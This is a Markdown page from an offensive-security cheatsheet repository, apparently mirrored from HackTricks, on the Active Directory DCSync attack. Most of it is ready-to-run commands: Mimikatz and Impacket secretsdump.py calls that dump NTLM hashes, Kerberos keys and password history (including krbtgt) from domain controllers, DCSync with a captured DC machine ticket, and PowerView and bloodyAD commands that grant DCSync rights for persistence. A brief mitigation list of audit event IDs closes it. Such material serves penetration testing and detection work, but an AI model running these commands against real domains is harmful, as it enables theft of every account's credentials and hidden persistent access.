daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

dcsync.md (7747B)


      1 ---
      2 title: "DCSync"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/dcsync.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/dcsync.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # DCSync
     14 
     15 ## DCSync
     16 
     17 The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.<sup>[[3]](#references)</sup>
     18 
     19 **Important Notes about DCSync:**
     20 
     21 - The **DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information** using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.
     22 - By default only **Domain Admins, Enterprise Admins, Administrators, and Domain Controllers** groups have the required privileges.
     23 - In practice, **full DCSync** needs **`DS-Replication-Get-Changes` + `DS-Replication-Get-Changes-All`** on the domain naming context. `DS-Replication-Get-Changes-In-Filtered-Set` is commonly delegated together with them, but on its own it is more relevant for syncing **confidential / RODC-filtered attributes** (for example legacy LAPS-style secrets) than for a full krbtgt dump.<sup>[[2]](#references)</sup>
     24 - If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text
     25 
     26 ### Enumeration
     27 
     28 Check who has these permissions using `powerview`:
     29 
     30 ```bash
     31 Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
     32 ```
     33 
     34 If you want to focus on **non-default principals** with DCSync rights, filter out the built-in replication-capable groups and review only unexpected trustees:
     35 
     36 ```powershell
     37 $domainDN = "DC=dollarcorp,DC=moneycorp,DC=local"
     38 $default = "Domain Controllers|Enterprise Domain Controllers|Domain Admins|Enterprise Admins|Administrators"
     39 Get-ObjectAcl -DistinguishedName $domainDN -ResolveGUIDs |
     40   Where-Object {
     41     $_.ObjectType -match 'replication-get' -or
     42     $_.ActiveDirectoryRights -match 'GenericAll|WriteDacl'
     43   } |
     44   Where-Object { $_.IdentityReference -notmatch $default } |
     45   Select-Object IdentityReference,ObjectType,ActiveDirectoryRights
     46 ```
     47 
     48 ### Exploit Locally
     49 
     50 ```bash
     51 Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
     52 ```
     53 
     54 ### Exploit Remotely
     55 
     56 ```bash
     57 secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
     58 [-just-dc-user <USERNAME>] #To get only of that user
     59 [-ldapfilter '(adminCount=1)'] #Or scope the dump to objects matching an LDAP filter
     60 [-just-dc-ntlm] #Only NTLM material, faster/cleaner when you don't need Kerberos keys
     61 [-pwd-last-set] #To see when each account's password was last changed
     62 [-user-status] #Show if the account is enabled/disabled while dumping
     63 [-history] #To dump password history, may be helpful for offline password cracking
     64 ```
     65 
     66 Practical scoped examples:<sup>[[1]](#references)</sup>
     67 
     68 ```bash
     69 # Only the krbtgt account
     70 secretsdump.py -just-dc-user krbtgt <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
     71 
     72 # Only privileged objects selected through LDAP
     73 secretsdump.py -just-dc-ntlm -ldapfilter '(adminCount=1)' <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
     74 
     75 # Add metadata and password history for cracking/reuse analysis
     76 secretsdump.py -just-dc-ntlm -history -pwd-last-set -user-status <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
     77 ```
     78 
     79 ### DCSync using a captured DC machine TGT (ccache)
     80 
     81 In unconstrained-delegation export-mode scenarios, you may capture a Domain Controller machine TGT (e.g., `DC1$@DOMAIN` for `krbtgt@DOMAIN`). You can then use that ccache to authenticate as the DC and perform DCSync without a password.<sup>[[5]](#references)</sup>
     82 
     83 ```bash
     84 # Generate a krb5.conf for the realm (helper)
     85 netexec smb <DC_FQDN> --generate-krb5-file krb5.conf
     86 sudo tee /etc/krb5.conf < krb5.conf
     87 
     88 # netexec helper using KRB5CCNAME
     89 KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \
     90   netexec smb <DC_FQDN> --use-kcache --ntds
     91 
     92 # Or Impacket with Kerberos from ccache
     93 KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \
     94   secretsdump.py -just-dc -k -no-pass <DOMAIN>/ -dc-ip <DC_IP>
     95 ```
     96 
     97 Operational notes:
     98 
     99 - **Impacket's Kerberos path touches SMB first** before the DRSUAPI call. If the environment enforces **SPN target name validation**, a full dump may fail with `Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user`.
    100 - In that case, either request a **`cifs/<dc>`** service ticket for the target DC first or fall back to **`-just-dc-user`** for the account you need immediately.
    101 - When you only have lower replication rights, LDAP/DirSync-style syncing can still expose **confidential** or **RODC-filtered** attributes (for example legacy `ms-Mcs-AdmPwd`) without a full krbtgt replication.<sup>[[2]](#references)</sup>
    102 
    103 `-just-dc` generates 3 files:
    104 
    105 - one with the **NTLM hashes**
    106 - one with the **Kerberos keys**
    107 - one with cleartext passwords from the NTDS for any accounts set with [**reversible encryption**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) enabled. You can get users with reversible encryption with
    108 
    109   ```bash
    110   Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
    111   ```
    112 
    113 ### Persistence
    114 
    115 If you are a domain admin, you can grant these permissions to any user with the help of PowerView:<sup>[[3]](#references)</sup>
    116 
    117 ```bash
    118 Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
    119 ```
    120 
    121 Linux operators can do the same with `bloodyAD`:
    122 
    123 ```bash
    124 bloodyAD --host <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' add dcsync <TRUSTEE>
    125 ```
    126 
    127 Then, you can **check if the user was correctly assigned** the 3 privileges looking for them in the output of (you should be able to see the names of the privileges inside the "ObjectType" field):
    128 
    129 ```bash
    130 Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
    131 ```
    132 
    133 ### Mitigation
    134 
    135 - Security Event ID 4662 (Audit Policy for object must be enabled) – An operation was performed on an object<sup>[[4]](#references)</sup>
    136 - Security Event ID 5136 (Audit Policy for object must be enabled) – A directory service object was modified
    137 - Security Event ID 4670 (Audit Policy for object must be enabled) – Permissions on an object were changed
    138 - AD ACL Scanner - Create and compare create reports of ACLs. [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
    139 
    140 ## References
    141 
    142 - [1] [Impacket ChangeLog](https://github.com/fortra/impacket/blob/master/ChangeLog.md)
    143 - [2] [DirSync: Leveraging Replication Get-Changes and Get-Changes-In-Filtered-Set](https://simondotsh.com/infosec/2022/07/11/dirsync.html)
    144 - [3] [DCSync: Dump Password Hashes from Domain Controller](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
    145 - [4] [DCSync](https://yojimbosecurity.ninja/dcsync/)
    146 - [5] [HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA](https://0xdf.gitlab.io/2025/09/12/htb-delegate.html)